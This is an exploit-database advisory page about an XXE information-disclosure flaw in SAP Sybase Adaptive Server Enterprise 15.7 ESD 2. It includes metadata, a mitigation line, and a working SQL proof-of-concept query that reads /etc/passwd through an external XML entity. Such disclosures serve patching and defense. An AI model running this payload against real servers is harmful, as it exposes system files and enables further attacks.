header-logo
Suggest Exploit
vendor:
Adaptive Server Enterprise
by:
SecurityFocus
7,5
CVSS
HIGH
Information Disclosure
200
CWE
Product Name: Adaptive Server Enterprise
Affected Version From: 15.7 ESD 2
Affected Version To: 15.7 ESD 2
Patch Exists: Yes
Related CWE: N/A
CPE: a:sybase:adaptive_server_enterprise
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

SAP Sybase Adaptive Server Enterprise Information Disclosure Vulnerability

SAP Sybase Adaptive Server Enterprise is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks. An attacker can exploit this issue by sending a specially crafted XML request containing an external entity declaration to the vulnerable server.

Mitigation:

Users should apply the latest available updates from the vendor to address this issue.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/63193/info

SAP Sybase Adaptive Server Enterprise is prone to an information-disclosure vulnerability.

An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.

SAP Sybase Adaptive Server Enterprise 15.7 ESD 2 is vulnerable; other versions may also be affected. 

SELECT xmlextract('/', xmlparse('<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/etc/passwd">]><content>&abc;</content>'))

Navigation

Suggest Exploit

Services By CQR